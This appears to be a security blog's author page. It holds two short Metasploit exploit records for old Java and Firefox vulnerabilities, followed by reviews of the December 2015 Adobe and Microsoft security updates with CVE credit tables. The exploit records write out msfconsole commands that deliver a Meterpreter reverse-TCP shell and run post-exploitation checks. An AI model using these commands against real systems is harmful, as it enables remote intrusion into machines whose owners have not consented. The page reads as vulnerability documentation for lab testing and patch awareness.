All posts by wow

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered exploited in the wild in 2013-02
Metasploit PoC provided the 2013-03-26
Patched by the vendor the 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to vendor by ZDI the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox previous version 17.0.2

Tested on :

with Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

APSB15-32 – Adobe Flash December 2015 Security Bulletin Review

Adobe has release, the December 8th 2015, during his December Patch Tuesday, one Adobe Flash security bulletin dealing with 77 vulnerabilities. This security bulletin has a Critical severity rating.

APSB15-32 is concerning:

  • Adobe Flash Player Desktop Runtime 19.0.0.245 and earlier on Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.261 and earlier on Windows and Macintosh
  • Adobe Flash Player for Google Chrome 19.0.0.245 and earlier on Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 19.0.0.245 and earlier on Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 19.0.0.245 and earlier on Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.548 and earlier on Linux
  • AIR Desktop Runtime 19.0.0.241 and earlier on Windows and Macintosh
  • AIR SDK 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 19.0.0.241 and earlier on Windows, Macintosh, Android and iOS
  • AIR for Android

Microsoft December 2015 Patch Tuesday Review

Microsoft has release, December 8th 2015, during his December 2015 Patch Tuesday, two updated security advisory, one new security advisory and twelve security bulletins. On the twelve security bulletins eight of them have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is concerning updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3119147 has been released for supported editions of for:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities described in Adobe Security bulletin APSB15-32.

Microsoft Security Advisory 3057154

MSA-3057154, release during July 2015, has been updated. The security advisory is concerning harden scenarios in which Data Encryption Standard (DES) encryption keys are used with accounts to ensure that domain users, services, and computers that support other encryption types are not vulnerable to credential theft or elevation of privilege attacks.  KB3057154 has been released for:

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 R2 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 R2 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)

Microsoft Security Advisory 3123040

MSA-3123040 concerns an SSL/TLS digital certificate for *.xboxlive.com for which the private keys were inadvertently disclosed. The certificate could be used in attempts to perform man-in-the-middle attacks. It cannot be used to issue other certificates, impersonate other domains, or sign code. This issue affects all supported releases of Microsoft Windows. KB2677070 has been release for:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows RT
  • Windows RT 8.1
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows 10
  • Windows 10 Version 1511
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2012 (Server Core installation)
  • Windows Server 2012 R2 (Server Core installation)
  • Windows Phone 8
  • Windows Phone 8.1
  • Windows 10 Mobile

MS15-124 Cumulative Security Update for Internet Explorer

MS15-124 security update, classified as Critical, allowing remote code execution, is the fix for 30 privately reported vulnerabilities in Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11. KB3116180 has been release for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-60839.3NoNoHui Gao of Palo Alto Networks
CVE-2015-61349.3NoNoSkyLined, working with HP’s Zero Day Initiative
CVE-2015-61355.0NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61369.3NoNo- Simon Zuckerbraun, working with HP’s Zero Day Initiative
- An anonymous researcher, working with HP’s Zero Day Initiative
- Yuki Chen of Qihoo 360Vulcan Team
CVE-2015-61384.3NoNoNone
CVE-2015-61399.3NoNoMichal Bentkowski
CVE-2015-61409.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61419.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61429.3NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61439.3NoNoNone
CVE-2015-61444.3NoNoMasato Kinugawa
CVE-2015-61459.3NoNoCong Zhang and Yi Jiang, working with Beijing VRV Software Co., LTD.
CVE-2015-61469.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61479.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61489.3NoNoA3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-61499.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61509.3NoNoB6BEB4D5E828CF0CCB47BB24AAC22515, working with HP’s Zero Day Initiative
CVE-2015-61519.3NoNoLi Kemeng of Baidu Security Team(x-Team) , working with HP’s Zero Day Initiative
CVE-2015-61529.3NoNoMoritz Jodeit of Blue Frost Security
CVE-2015-61539.3NoNoShi Ji (@Puzzor)
CVE-2015-61549.3NoNoChenDong Li and YunZe Ni of Tencent
CVE-2015-61559.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61569.3NoNoAnonymous contributor, working with VeriSign iDefense Labs
CVE-2015-61574.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61589.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61599.3NoNoZheng Huang of the Baidu Scloud XTeam
CVE-2015-61609.3NoNoGarage4Hackers, working with HP’s Zero Day Initiative
CVE-2015-61614.3NoNoRh0
CVE-2015-61629.3NoNoWenxiang Qian of TencentQQBrowser
CVE-2015-61646.8NoNoNone

MS15-125 Cumulative Security Update for Microsoft Edge

MS15-125 security update, classified as Critical, allowing remote code execution, is the fix for 15 privately reported vulnerabilities in Microsoft Edge on Windows 10. KB3116184 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61399.3NoNoMichal Bentkowski
CVE-2015-61409.3NoNoBo Qu of Palo Alto Networks
CVE-2015-61429.3NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61489.3NoNoA3F2160DCA1BDE70DA1D99ED267D5DC1EC336192, working with HP’s Zero Day Initiative
CVE-2015-61519.3NoNoLi Kemeng of Baidu Security Team(x-Team) , working with HP’s Zero Day Initiative
CVE-2015-61539.3NoNoShi Ji (@Puzzor)
CVE-2015-61549.3NoNoChenDong Li and YunZe Ni of Tencent
CVE-2015-61559.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61589.3NoNoZheng Huang of the Baidu Scloud XTeam, working with VeriSign iDefense Labs
CVE-2015-61599.3NoNoZheng Huang of the Baidu Scloud XTeam
CVE-2015-61614.3NoNoRh0
CVE-2015-61689.3NoNoSkyLined, working with HP’s Zero Day Initiative
CVE-2015-61694.3NoNoNone
CVE-2015-61706.8NoNoMario Heiderich of Cure53
CVE-2015-61764.3NoNoMasato Kinugawa

MS15-126 Cumulative Security Update for JScript and VBScript

MS15-126 security update, classified as Critical, allowing remote code execution, is the fix for 2 privately reported vulnerabilities in VBScript scripting engine in Microsoft Windows. KB3116178 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61355.0NoNoSimon Zuckerbraun, working with HP’s Zero Day Initiative
CVE-2015-61369.3NoNo- Simon Zuckerbraun, working with HP’s Zero Day Initiative
- An anonymous researcher, working with HP’s Zero Day Initiative
- Yuki Chen of Qihoo 360Vulcan Team

MS15-127 Security Update for Microsoft Windows DNS

MS15-127 security update, classified as Critical, allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if an attacker sends specially crafted requests to a DNS server. KB3100465 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61259.3NoNoNone

MS15-128 Security Update for Microsoft Graphics Component

MS15-128 security update, classified as Critical, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows, .NET Framework, Microsoft Office, Skype for Business, Microsoft Lync, and Silverlight. The vulnerabilities could allow remote code execution if a user opens a specially crafted document or visits a webpage that contains specially crafted embedded fonts. KB3104503 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61069.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61079.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61089.3NoNoNone

MS15-129 Security Update for Silverlight

MS15-129 security update, classified as Critical, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Silverlight. KB3106614 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61144.3YesYesNone
CVE-2015-61654.3NoNoMarcin 'Icewall' Noga of Cisco Talos
CVE-2015-61669.3NoNoNone

CVE-2015-6114 vulnerability details have been disclosed publicly by @_Icewall from Cisco Talos vulndev team.

MS15-130 Security Update for Microsoft Uniscribe

MS15-130 security update, classified as Critical, allowing remote code execution, is the fix for 1 privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted document or visits an untrusted webpage that contains specially crafted fonts. KB3108670 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61309.3NoNoHossein Lotfi, Secunia Research (now part of Flexera Software)

MS15-131 Security Update for Microsoft Office

MS15-131 security update, classified as Critical, allowing remote code execution, is the fix for 6 privately reported vulnerabilities in Microsoft Windows. Interesting to see that CVE-2015-6124 has been privately reported but seen as exploited in wild. KB3116111 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-60409.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61189.3NoNoKai Lu of Fortinet's FortiGuard Labs
CVE-2015-61229.3NoNoSteven Vittitoe of Google Project Zero
CVE-2015-61249.3NoYesNone
CVE-2015-61729.3NoNoHaifei Li of Intel Security IPS Research Team
CVE-2015-61779.3NoNoKai Lu of Fortinet's FortiGuard Labs

MS15-132 Security Update for Microsoft Windows

MS15-132 security update, classified as Important, allowing remote code execution, is the fix for 3 privately reported vulnerabilities in Microsoft Windows. KB3116162 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61287.2YesYes- Steven Vittitoe of Google Project Zero
- Parvez Anwar
CVE-2015-61327.2NoNoNone
CVE-2015-61337.2NoNoNone

CVE-2015-6128 vulnerability details have been disclosed publicly with a proof of concept.

MS15-133 Security Update for Windows PGM

MS15-133 security update, classified as Important, allowing elevation of privilege, is the fix for 1 privately reported vulnerability in Microsoft Windows. KB3116130 has been released for fixing the bellow vulnerability:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61267.2NoNoNone

MS15-134 Security Update for Windows Media Center

MS15-134 security update, classified as Important, allowing remote code execution, is the fix for 2 privately reported vulnerabilities in Microsoft Windows. KB3108669 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61274.3YesYesFrancisco Falcon of Core Security
CVE-2015-61319.3YesYesZhang YunHai of NSFOCUS Security Team

CVE-2015-6127 vulnerability details have been disclosed publicly with a proof of concept.

CVE-2015-6131 vulnerability details have been disclosed publicly with a proof of concept.

MS15-135 Security Update for Windows Kernel-Mode Drivers

MS15-135 security update, classified as Important, allowing elevation of privilege, is the fix for 4 privately reported vulnerabilities in Microsoft Windows. Interesting to see that CVE-2015-6175 has been publicly reported and also seen exploited in wild. KB3119075 has been released for fixing the bellow vulnerabilities:

CVECVSS scoreDisclosedExploitedCredit
CVE-2015-61717.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61737.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61747.2NoNoNils Sommer of bytegeist, working with Google Project Zero
CVE-2015-61757.2YesYesNone